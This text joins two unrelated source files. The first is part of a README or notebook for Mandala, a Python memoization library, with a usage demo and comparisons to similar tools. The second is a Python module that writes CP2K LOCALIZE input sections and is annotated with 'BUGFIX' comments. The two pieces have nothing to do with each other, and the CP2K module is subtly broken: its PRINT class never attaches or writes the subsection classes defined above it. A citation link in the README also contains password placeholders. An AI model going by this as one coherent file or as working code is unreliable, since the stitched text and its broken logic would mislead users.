# create a storage for results; all memoized calls below are recorded in it
storage = Storage(in_memory=True) # can also be persistent (on disk)
@op(storage) # memoization decorator
def inc(x) -> int:
    """Return x + 1; calls are memoized in `storage` via @op."""
    return x + 1
@op(storage)
def mean(x: List[int]) -> float:
    """Return the arithmetic mean of the ints in `x`."""
    # you can operate on / return collections of memoized results
    return sum(x) / len(x)
with run(storage): # calls inside `run` block are memoized
    nums = [inc(i) for i in range(5)]
    result = mean(nums) # memoization composes through lists without copying data
    print(f'Mean of 5 nums: {result}')
# add logic/parameters directly on top of memoized code without re-doing past work
# (lazy=True: past results are loaded on demand, only new calls execute)
with run(storage, lazy=True):
    nums = [inc(i) for i in range(10)]
    result = mean(nums)
# walk over chains of calls without loading intermediate data
# to traverse storage and collect results flexibly
with run(storage, lazy=True):
    nums = [inc(i) for i in range(10)]
    result = mean(nums)
    print(f'Reference to mean of 10 nums: {result}')
    storage.attach(result) # load the value in-place
    print(f'Loaded mean of 10 nums: {result}')
# pattern-match to memoized compositions of calls
with query(storage) as q:
    # this may not make sense unless you read the tutorials
    i = Query()
    inc_i = inc(i).named('inc_i')
    nums = MakeList(containing=inc_i, at_index=0).named('nums')
    result = mean(nums).named('result')
    # one row per matching composition of calls in storage
    df = q.get_table(inc_i, nums, result)
df
# ## Why Mandala?
# ### Advantages
# Compared to other tools for tracking and managing computations, the features that
# most set Mandala apart are the direct and concise patterns in which complex
# Python code can interact with its own storage. This manifests in several ways:
# - **Python code as interface to its own storage**: you just write the code to compute
# what you want to compute (freely using Python's control flow and collections),
# and directly add more parameters and logic to it over time. Mandala takes
# care of the rest:
# - **the organization of storage mirrors the structure of code**, and Mandala
# provides you with the tools to make maximum use of this --
# retracing memoized code with on-demand data loading, and declarative
# code-based pattern-matching.
# - this leads to **simple, intuitive and flexible ways to query and iterate on
# experiments**, even when their logic gets quite complex -- without any data
# organization efforts on your part.
# - it also allows you to **query relationships between any variables in your
# projects**, even when they are separated by many computational steps -- **without
# explicitly annotating these relationships**.
# - **refactor code and data will follow**: Mandala makes it easy to apply
# familiar software refactorings to code *without* losing the relationship to
# this code's existing results. This gives you high-level tools to manage the
# complexity of both the code and its data as the project grows.
# - **organize all results and their relationships**: Mandala manages all the
# artifacts produced by computations, not just a set of human-readable
# metrics. It lets you use pure Python idioms to
# - compute with **data structures with shared substructure**
# - **index and view data in multiple ways** and on multiple levels of analysis
#
# without storage duplication. This gives you much flexibility in manipulating
# the contents of storage to express your intent.
#
# ### Comparisons
# Mandala takes inspiration from many other programming tools and concepts. Below
# is an (incomplete but growing) list of comparisons with relevant tools:
# - [algebraicjulia](https://www.algebraicjulia.org/):
# [conjunctive](https://www.algebraicjulia.org/blog/post/2020/12/cset-conjunctive-queries/) [queries](https://www.algebraicjulia.org/blog/post/2020/11/sql-as-hypergraph/)
# are integral to Mandala's declarative interface, and are generalized in
# several ways to make them practical for complex experiments:
# - a single table of values is used to enable polymorphism
# - operations on lists/dicts are integrated with query construction
# - queries can use the hierarchical structure of computations
# - constraints can be partitioned (to avoid interaction) while using some
# shared base (to enable code reuse)
# - dynamic query generation can use conditionals to enable disjunctive
# queries, and even loops (though this quickly becomes inefficient)
# - [koji](https://arxiv.org/abs/1901.01908) and [content-addressable computation](https://research.protocol.ai/publications/ipfs-fan-a-function-addressable-computation-network/delarocha2021a.pdf):
# Mandala uses causal hashing to
# - ensure correct, deterministic and idempotent behavior;
# - avoid hashing large (or unhashable) Python objects;
# - avoid discrepancies between object hashes across library versions
#
# Mandala can be thought of as a single-node, Python-only implementation of
# general-purpose content-addressable computation with two extra features:
# - hierarchical organization of computation,
# - declarative queries
# - [funsies](https://github.com/aspuru-guzik-group/funsies) is a workflow engine
# for Python scripts that also uses causal hashing. Mandala differs by
# integrating more closely with Python (by using functions instead of scripts as
# the units of work), and thus enabling more fine-grained control and
# expressiveness over what gets computed and how.
# - [joblib.Memory](https://joblib.readthedocs.io/en/latest/memory.html#memory)
# implements persistent memoization for Python functions that overcomes some of
# the issues naive implementations have with large and complex Python objects.
# Mandala augments `joblib.Memory` in some key ways:
# - memoized calls can be queried/deleted declaratively
# - collections and memoized functions calling other memoized functions can
# reuse storage
# - you can modify and refactor memoized functions while retaining connection to
# memoized calls
# - you can avoid the latency of hashing large/complex objects
# - [incpy](https://dl.acm.org/doi/abs/10.1145/2001420.2001455?casa_token=<PASSWORD>:<PASSWORD>)
# augments the Python interpreter with automatic persistent memoization. Mandala
# also enables automatic persistent memoization, but it is different from
# `incpy` in some key ways:
# - uses decorators to explicitly designate memoized functions (which can be
# good or bad depending on your goals)
# - allows for lazy retracing of memoized calls
# - provides additional features like the ones mentioned in the comparison with
# `joblib.Memory`
#
# ### Philosophy
# When can we declare data management for computational experiments a solved
# problem? It's unclear how to turn this question into a measurable goal, but
# there is a somewhat objective *lower bound* on how simple data management can
# get:
#
# > At the end of the day, we have to *at least* write down the (Python) code to express
# > the computations we want to run, *regardless* of data management concerns.
# > Can this be *all* the code we have to write, and *still* be able to achieve
# > the goals of data management?
#
# Mandala aims to bring us to this idealized lower bound. It adopts the view that
# Python itself is flexible and expressive enough to capture our intentions about
# experiments. There shouldn't be a ton of extra interfaces, concepts and syntax
# between your thoughts, their expression in code, and its results.
#
# By mirroring the structure of computational code in the organization of data,
# and harmoniously extending Python's tools for capturing intention and managing
# complexity, we can achieve a more flexible, natural and immediate way to
# interact with computations.
#
# This echoes the design goals of some other tools. For example,
# [dask](https://dask.org) and [ray](https://ray.io) (both of which Mandala
# integrates with) aim to let you write Python code the way you are used to, and
# take care of parallelization for you.
# ## Limitations
# This project is under active development, and not ready for production. Its goal
# so far has been to demonstrate that certain high-level programming patterns are
# viable by building a sufficiently useful working prototype. Limitations can be
# summarized as follows:
# - it is easy to get started, but effective use in complex projects requires some
# getting used to;
# - much of the code does what it does in very simple and often inefficient ways;
# - interfaces and (more importantly) storage formats may change in backward
# incompatible ways.
# - bugs likely still exist;
#
# That being said, Mandala is already quite usable in many practical situations.
# Below is a detailed outline of current limitations you should be aware of if you
# consider using this library in your work.
#
# ### "Missing" features
# There are some things you may be used to seeing in projects like this that
# currently don't exist:
# - **functions over scripts**: Mandala focuses on functions as the basic
# building blocks of experiments as opposed to Python scripts. There is no
# fundamental conceptual distinction between the two, but:
# - functions provide a better-behaved interface, especially when it comes to
# typing, refactoring, and hierarchical organization
# - using functions makes it much easier to use
# projects such as [ray](https://www.ray.io/) and [dask](https://dask.org/)
# alongside Mandala
# - if you don't need to do something extra complicated involving different
# Python processes or virtual environments, it is easy to wrap a script as a
# function that takes in some settings and resource descriptions (e.g., paths to
# input files) and returns other resource descriptions (e.g., paths to output
# files). However, the burden of refactoring the script's interface manually
# and organizing its input/output resources would still be on you. So, always
# use a function where you can.
# - **no integration with git**: version control data is not automatically
# included in Mandala's records at this point, though this would be an easy
# addition. There are other programming patterns available for working with
# multiple versions of code.
# - **no GUI**: for now, the library leans heavily towards using computational
# code itself as a highly programmable interface to results, and visualization
# is left to other tools.
#
# ### Acquiring best practices
# Using some features effectively requires deeper understanding:
# - **declarative queries**: It's possible to create underconstrained
# pattern-matching queries which return a number of rows that grows
# multiplicatively with the numbers of rows of memoization tables of functions
# in the query. Such queries may take a very long time or run out of RAM even
# for moderately-sized projects (`sqlite` will usually complain about this at
# the start of the query).
#
# Certain ways to define and compose memoized functions promote such queries, so
# a good understanding of this issue may be needed depending on the project.
# - **deletions**: deleting anything from storage is subject to invariants that
# prevent the existence of "mysterious" objects (ones without a computational
# history tracing back to user inputs) from existing. This means that you must
# understand well how deletion works to avoid deleting more things than you
# really intend.
#
# ### Performance
# The library has not been optimized much for performance. A few things to keep in
# mind for now:
# - When using disk-based persistence, Mandala introduces an overhead of a few 10s
# of ms for each call to a memoized function, on top of any work to serialize
# inputs/outputs and run the function.
# - Storing and loading large collections can be slow (a list of 1000 integers
# already leads to a visible ~1s delay)
|
<gh_stars>1-10
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# =================================
# CP2K / FORCE_EVAL /DFT / LOCALIZE
# =================================
class cp2k_dft_localize_print_loc_restart_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/LOC_RESTART in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` -- `none` is an undefined
            # name (NameError once a param is set); the singleton is `None`.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_loc_restart:
    """&LOC_RESTART subsection of DFT/LOCALIZE/PRINT in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.each = cp2k_dft_localize_print_loc_restart_each()
    # basic setting
    def to_input(self, fout):
        """Write the &LOC_RESTART ... &END LOC_RESTART section to fout."""
        fout.write("\t\t\t\t&LOC_RESTART\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END LOC_RESTART\n")
    def set_params(self, params):
        """Route dash-joined keys: 5 parts stay here, EACH keys go to self.each."""
        for item in params:
            if len(item.split("-")) == 5:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[4] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_molecular_dipoles_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/MOLECULAR_DIPOLES."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_molecular_dipoles:
    """&MOLECULAR_DIPOLES subsection of DFT/LOCALIZE/PRINT in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.each = cp2k_dft_localize_print_molecular_dipoles_each()
    # basic setting
    def to_input(self, fout):
        """Write the &MOLECULAR_DIPOLES ... &END section to fout."""
        fout.write("\t\t\t\t&MOLECULAR_DIPOLES\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END MOLECULAR_DIPOLES\n")
    def set_params(self, params):
        """Route dash-joined keys: 5 parts stay here, EACH keys go to self.each."""
        for item in params:
            if len(item.split("-")) == 5:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[4] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_molecular_states_cubes_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/MOLECULAR_STATES/CUBES."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 7-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 7:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_molecular_states_cubes:
    """&CUBES subsection of DFT/LOCALIZE/PRINT/MOLECULAR_STATES."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.each = cp2k_dft_localize_print_molecular_states_cubes_each()
    # basic setting
    def to_input(self, fout):
        """Write the &CUBES ... &END CUBES section to fout."""
        fout.write("\t\t\t\t\t&CUBES\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t\t&END CUBES\n")
    def set_params(self, params):
        """Route dash-joined keys: 6 parts stay here, EACH keys go to self.each."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[5] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_molecular_states_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/MOLECULAR_STATES."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_molecular_states:
    """&MOLECULAR_STATES subsection of DFT/LOCALIZE/PRINT in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.cubes = cp2k_dft_localize_print_molecular_states_cubes()
        self.each = cp2k_dft_localize_print_molecular_states_each()
    # basic setting
    def to_input(self, fout):
        """Write the &MOLECULAR_STATES ... &END section to fout."""
        fout.write("\t\t\t\t&MOLECULAR_STATES\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.cubes.status:
            self.cubes.to_input(fout)
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END MOLECULAR_STATES\n")
    def set_params(self, params):
        """Route dash-joined keys: 5 parts stay here, CUBES/EACH keys go down."""
        for item in params:
            if len(item.split("-")) == 5:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[4] == "CUBES":
                self.cubes.set_params({item: params[item]})
            elif item.split("-")[4] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_program_run_info_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/PROGRAM_RUN_INFO."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_program_run_info:
    """&PROGRAM_RUN_INFO subsection of DFT/LOCALIZE/PRINT in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.each = cp2k_dft_localize_print_program_run_info_each()
    # basic setting
    def to_input(self, fout):
        """Write the &PROGRAM_RUN_INFO ... &END section to fout."""
        fout.write("\t\t\t\t&PROGRAM_RUN_INFO\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END PROGRAM_RUN_INFO\n")
    def set_params(self, params):
        """Route dash-joined keys: 5 parts stay here, EACH keys go to self.each."""
        for item in params:
            if len(item.split("-")) == 5:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[4] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_total_dipole_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/TOTAL_DIPOLE."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_total_dipole:
    """&TOTAL_DIPOLE subsection of DFT/LOCALIZE/PRINT in a CP2K input."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the section
        self.params = {
        }
        # the caller only emits this section when status is True
        self.status = False
        self.each = cp2k_dft_localize_print_total_dipole_each()
    # basic setting
    def to_input(self, fout):
        """Write the &TOTAL_DIPOLE ... &END section to fout."""
        fout.write("\t\t\t\t&TOTAL_DIPOLE\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END TOTAL_DIPOLE\n")
    def set_params(self, params):
        """Route dash-joined keys: 5 parts stay here, EACH keys go to self.each."""
        for item in params:
            if len(item.split("-")) == 5:
                self.params[item.split("-")[-1]] = params[item]
            elif item.split("-")[4] == "EACH":
                self.each.set_params({item: params[item]})
            else:
                pass
class cp2k_dft_localize_print_wannier_centers_each:
    """&EACH subsection of DFT/LOCALIZE/PRINT/WANNIER_CENTERS."""
    def __init__(self):
        # keyword -> value pairs written verbatim into the &EACH section
        self.params = {
        }
        # the parent section only emits this subsection when status is True
        self.status = False
    def to_input(self, fout):
        """Write the &EACH ... &END EACH section to the file stream fout."""
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # BUGFIX: original tested `is not none` (undefined name) -> None.
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        """Store the last part of each 6-part dash-joined key."""
        for item in params:
            if len(item.split("-")) == 6:
                self.params[item.split("-")[-1]] = params[item]
            else:
                pass
class cp2k_dft_localize_print_wannier_centers:
    """&WANNIER_CENTERS print section of a CP2K &LOCALIZE block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
        self.each = cp2k_dft_localize_print_wannier_centers_each()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t&WANNIER_CENTERS\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status == True:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END WANNIER_CENTERS\n")
    def set_params(self, params):
        # 5-component keys belong to this section; "…-EACH-…" keys go to &EACH
        for item in params:
            parts = item.split("-")
            if len(parts) == 5:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 4 and parts[4] == "EACH":
                self.each.set_params({item: params[item]})
class cp2k_dft_localize_print_wannier_cubes_each:
    """&EACH subsection of &WANNIER_CUBES in a CP2K &LOCALIZE/&PRINT block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        # keys look like "A-B-C-D-E-KEYWORD" (6 components); store the keyword
        for item in params:
            parts = item.split("-")
            if len(parts) == 6:
                self.params[parts[-1]] = params[item]
class cp2k_dft_localize_print_wannier_cubes:
    """&WANNIER_CUBES print section of a CP2K &LOCALIZE block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
        self.each = cp2k_dft_localize_print_wannier_cubes_each()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t&WANNIER_CUBES\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status == True:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END WANNIER_CUBES\n")
    def set_params(self, params):
        # 5-component keys belong to this section; "…-EACH-…" keys go to &EACH
        for item in params:
            parts = item.split("-")
            if len(parts) == 5:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 4 and parts[4] == "EACH":
                self.each.set_params({item: params[item]})
class cp2k_dft_localize_print_wannier_spreads_each:
    """&EACH subsection of &WANNIER_SPREADS in a CP2K &LOCALIZE/&PRINT block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        # keys look like "A-B-C-D-E-KEYWORD" (6 components); store the keyword
        for item in params:
            parts = item.split("-")
            if len(parts) == 6:
                self.params[parts[-1]] = params[item]
class cp2k_dft_localize_print_wannier_spreads:
    """&WANNIER_SPREADS print section of a CP2K &LOCALIZE block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
        self.each = cp2k_dft_localize_print_wannier_spreads_each()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t&WANNIER_SPREADS\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status == True:
            self.each.to_input(fout)
        fout.write("\t\t\t\t&END WANNIER_SPREADS\n")
    def set_params(self, params):
        # 5-component keys belong to this section; "…-EACH-…" keys go to &EACH
        for item in params:
            parts = item.split("-")
            if len(parts) == 5:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 4 and parts[4] == "EACH":
                self.each.set_params({item: params[item]})
class cp2k_dft_localize_print_wannier_states_cubes_each:
    """&EACH subsection of &WANNIER_STATES/&CUBES in a CP2K input file."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t\t\t&EACH\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        # keys look like "A-B-C-D-E-F-KEYWORD" (7 components); store the keyword
        for item in params:
            parts = item.split("-")
            if len(parts) == 7:
                self.params[parts[-1]] = params[item]
class cp2k_dft_localize_print_wannier_states_cubes:
    """&CUBES subsection of the &WANNIER_STATES print section."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
        self.each = cp2k_dft_localize_print_wannier_states_cubes_each()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t\t&CUBES\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.each.status == True:
            self.each.to_input(fout)
        fout.write("\t\t\t\t\t&END CUBES\n")
    def set_params(self, params):
        # 6-component keys belong to this section; "…-EACH-…" keys go to &EACH
        for item in params:
            parts = item.split("-")
            if len(parts) == 6:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 5 and parts[5] == "EACH":
                self.each.set_params({item: params[item]})
class cp2k_dft_localize_print_wannier_states_each:
    """&EACH subsection of &WANNIER_STATES in a CP2K &LOCALIZE/&PRINT block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t\t&EACH\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t\t\t&END EACH\n")
    def set_params(self, params):
        # keys look like "A-B-C-D-E-KEYWORD" (6 components); store the keyword
        for item in params:
            parts = item.split("-")
            if len(parts) == 6:
                self.params[parts[-1]] = params[item]
class cp2k_dft_localize_print_wannier_states:
    """&WANNIER_STATES print section of a CP2K &LOCALIZE block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
        self.cubes = cp2k_dft_localize_print_wannier_states_cubes()
        self.each = cp2k_dft_localize_print_wannier_states_each()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        fout.write("\t\t\t\t&WANNIER_STATES\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.cubes.status == True:
            self.cubes.to_input(fout)
        if self.each.status == True:
            self.each.to_input(fout)
        # bug fix: closing tag was "&END WANNIERS_STATES", which does not
        # match the opening "&WANNIER_STATES" and breaks CP2K parsing
        fout.write("\t\t\t\t&END WANNIER_STATES\n")
    def set_params(self, params):
        # 5-component keys belong here; "…-CUBES-…"/"…-EACH-…" are forwarded
        for item in params:
            parts = item.split("-")
            if len(parts) == 5:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 4 and parts[4] == "CUBES":
                self.cubes.set_params({item: params[item]})
            elif len(parts) > 4 and parts[4] == "EACH":
                self.each.set_params({item: params[item]})
class cp2k_dft_localize_print:
    """&PRINT section of a CP2K &LOCALIZE block."""
    def __init__(self):
        # keyword -> value mapping; entries left as None are not written out
        self.params = {
        }
        self.status = False
    def to_input(self, fout):
        # fout: a file stream for writing
        # consistency fix: every other section in this file writes uppercase
        # section names ("&EACH", "&TOTAL_DIPOLE", ...); CP2K keywords are
        # case-insensitive, so uppercasing "&print" only normalizes style
        fout.write("\t\t\t&PRINT\n")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                fout.write("\t\t\t\t%s %s\n" % (item, str(self.params[item])))
        fout.write("\t\t\t&END PRINT\n")
    def set_params(self, params):
        # keys look like "A-B-C-KEYWORD" (4 components); store the keyword
        for item in params:
            parts = item.split("-")
            if len(parts) == 4:
                self.params[parts[-1]] = params[item]
class cp2k_dft_localize:
    """&LOCALIZE section of a CP2K &DFT block.

    about:
        to calculate ir spectra from md running
        it is necessary to have dipole information
        for the molecules available in the simulated
        trajectory.
    """
    def __init__(self):
        self.params = {
            "method": None,
            "max_iter": None,
        }
        self.status = False
        self.printout = cp2k_dft_localize_print()
    # basic setting
    def to_input(self, fout):
        # fout: a file stream for writing
        # consistency fix: uppercase the section name to match the
        # "&END LOCALIZE" closing tag (CP2K keywords are case-insensitive)
        fout.write("\t\t&LOCALIZE %s\n" % ".true.")
        for item in self.params:
            # bug fix: 'none' was an undefined name (NameError); use None
            if self.params[item] is not None:
                # bug fix: parameters were written with a single tab, which
                # misaligned them with the enclosing "\t\t" section level
                fout.write("\t\t\t%s %s\n" % (item, str(self.params[item])))
        if self.printout.status == True:
            self.printout.to_input(fout)
        fout.write("\t\t&END LOCALIZE\n")
    def set_params(self, params):
        # 3-component keys belong here; "…-PRINT-…" keys go to the subsection
        for item in params:
            parts = item.split("-")
            if len(parts) == 3:
                self.params[parts[-1]] = params[item]
            elif len(parts) > 2 and parts[2] == "PRINT":
                self.printout.set_params({item: params[item]})
|
